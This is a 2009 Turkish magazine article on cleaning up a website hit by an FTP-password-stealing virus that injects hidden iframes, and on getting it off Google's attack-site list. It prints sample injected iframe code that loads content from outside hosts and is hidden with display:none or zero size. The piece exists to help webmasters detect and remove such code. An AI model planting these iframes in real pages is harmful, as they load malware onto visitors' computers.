Photoshop Magazin
 


Sitem “Saldırgan” Olmuş, Nasıl Sakinleştiririm Doktor Bey…

01 October 2009 | Sayı: Oct 2009
 
1 2 3 4 5
 

Uzunca süredir takip ettiğim çok popüler bir siteye girmeye çalıştığımda gördüm bu uyarıyı ilk kez. Sitenin sahibini de tanıyordum ve o taraklarda bezi olmayacak kadar idealist olduğunu bildiğimden hemen cebinden aradım durumu anlattım. O da şaşırdı duruma ve başladık sorunu araştırmaya.


Sitem “Saldırgan” Olmuş,Nasıl Sakinleştiririm Doktor Bey…

Evet sitesi hacklenmişti. Server kendine aitti ve kodları da kendi yazmıştı. Açığı araştırdık kodları satır satır inceledik. default.asp’nin en altındaki iframe kodunu görünce sorunu anlamış olduk ve başladık bunun nasıl bulaştığını araştırmaya...
Son zamanlarda büyük hızla yayılan yeni bu virüs bir çok webmasterin sorunu oldu ve olmaya da devam ediyor. Virüsün bulaşması için virüs bulaşmış bir web sitesine girmeniz yeterli oluyor. Eğer bilgisayarınızda güncellenmiş ve bu virüsü tanıyan bir antivirüs programı yüklü değilse bu virüs sizede bulaşıyor ki arkadaşıma da bu yüzden bulaşmış. Daha sonra virüslü bilgisayarda hangi sitenin FTP’sini açarsanız açın girdiğiniz FTP bilgilerini kaydediyor ve saldırgana iletiyor. Daha sonra saldırgan bir script sayesinde FTP bilgilerini ele geçirdiği sitelere girip index. php, index.html, index.htm, default.asp‘nin içlerine (genellikle sayfanın en sonuna) iframe kodu ekliyor.
Virüs Bize Nasıl Bulaşır?
1. Saldırgan site öncelikle güncel antivirus yazılımları bulunmayan bilgisayarınıza bir virus bulaştırır. Eğer güncel bir antivirüs yazılımınız varsa bir uyarıyla sizi uyaracak ve virüs bulaşmadan etkisiz hale getirecektir.


2. Bilgisayarınıza bulaşan virüsun amacı bilgisayarınızdaki kurulu FTP programında tutulan tüm FTP şifrelerinizi çalmaktır. FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman kullandığı script sayesinde sitenize FTP girişi yapıp, index.*, default.* veya tüm dosyalarınızın .html tag’lerinin arasına (genellikle sayfanın sonuna) iframe veya script tag’i yerleştirir.

Virüsün Eklediği Kod Nedir?
Eklenen iframe kodu genelde şu yapıdadır:
<div style=”display:none”><iframe width=100 height=100 src=”http://age-inf.ru:8080/index.php” ></iframe>
<IFRAME src=”http://red-wolf.ru/index.php” style=”border:0px solid gray;” WIDTH=”0” HEIGHT=”
0” FRAMEBORDER=”0” MARGINWIDTH=”0” MARGINHEIGHT=”0” SCROLLING=”no”></IFRAME>
<IFRAME src=”http://saldırgansiteadresi.com\123.js“ width=”1” height=”1” style=”visibility:hidden;position:absolute”></IFRAME>
Virüs Nasıl Etkiliyor?
Eklenen bu iframe kodu bazen bir pop up açarken bazen de malware olarak adlandırılan kullanıcının bilgisayarına sızan bir virüs yükletmeye çalışıyor. Eklenen bu iframe’i genelde göremiyoruz çünkü kodu eklerken iframe’i gizli olarak eklenmiş oluyor. (visibility:hidden veya display:none)
Kod eklendikten sonra Google botları sitemizi tararken bu kodlamayı görüyor. Linki takip eden botlar iframe’in yüklendiği siteden
yapılan saldırıyı algılıyor ve virüs yayılmaya çalışıyor diye sitenizi “saldırgan site” sınıflandırmasını sokuyor. IFRAME Virüsü bulaşan
siteler Google tarafında saldırgan site olarak sınıflandırılıp giriş izni verilmiyor .
Korunmak İçin Ne Yapmalı?
Mutlaka kaliteli bir antivirüs yazılımını kurmalıyız ve antivirüs database’ni sürekli güncellemeliyiz.FTP şifrenizi zor tahmin edilebilecek bir şifreyle değiştiriniz. FTP şifrenizi otomatik girişe ayarlamayın. Bu sayede çalınmasını
önleyebilirsiniz. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularından hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız. Windows Server’da ise yönetim panelinden dosya izinlerini read only yapın.
Virüs Benim Siteme de Bulaştımı? Nasıl kontrol edebilirim?
Sitenizdeki başta index.*, default.* dosyaları olmak üzere tüm siteyi bilgisayarınıza indirip html kodlarını gözden geçirmeniz gerekiyor. Index.* ve/veya default.* dosyalarınız temiz ise %90 ihtimalle virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara
bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz. Hatta tüm dosyalar içinde iframe kelimesini aramakta fayda var. Bunu için Dreamweaver’in klasör içinde arama özelliğini kullanabiliriz. Find And Replace özelliğine Ctrl + F yada Edit > Find And Replace menüsü ile erişebilirsiniz. Find kısmına iframe yazmalıyız. Find in seçeneği aramayı nerde yapacağımızı işaret eder. Burada folder seçeneğini seçmeliyiz.

Daha sonra klasör ikonuna basarak sitemizi indirdiğimiz klasörü seçmeliyiz. Search kısmında kodlarda arama yapacağımız için Source Code seçili olmalıdır. Seçme işleminden sonra Find All’ı tıklayın. DW bizim için tüm site dökümanlarını tarayıp içinde iframe kodu geçen yerleri listeleyecektir. Size düşen ise eğer varsa bu dökümanları açarak temizleme işlemlerini yapmak ve siteyi tekrar FTP ile geri yüklemek.Ayrıca bilgisayarımızı sağlam bir virüs taramasından geçirip, tüm FTP şifrelerimizi değiştirmeyi unutmayalım.
Virüsü sildim! Google’a bunu nasıl bildireceğim?
Saldırgan Site sınıfına giren sitemiz Google Chrome, Firefox ve Safari ile sitemizi açmaya çalışan kişilere bir uyarı ekranı ile karşılık verecektir ve kullanıcılar sitenize erişemeyecektir. Google’un saldırgan site listesinden çıkmak için Google Webmaster Tools’a girmemiz gerekiyor.

Siteye girdikten sonra Add Site diyerek sitemizi ekleyeceğiz.

Continue basıp ilerleyince karşımıza Site Verification sayfası çıkacak. Sitenin bize ait olup olmadığını kontrol için bize verilen meta etiketi alıp sitemizin ana sayfasının <head>…</head> tag’leri arasına ekliyoruz.

Sadece ana sayfaya eklemek yeterli. Bize sitenin saldırgan olduğuna dair bir uyarı çıkaracak ve sorunlu linkleri gösterecek. Biz burada Request a Review linkine tıklıyoruz. Açılacak mesaj alanına açıklamamızı yazıp gönderiyoruz. Bu işlemlerden sonra Google kısa bir süre içinde sitemizi saldırgan site listesinden çıkarıyor ve sitemiz kaldığı yerden yayınına devam ediyor.
Gelecek sayı görüşmek üzere...

 

October 2009

 


Dreamweaver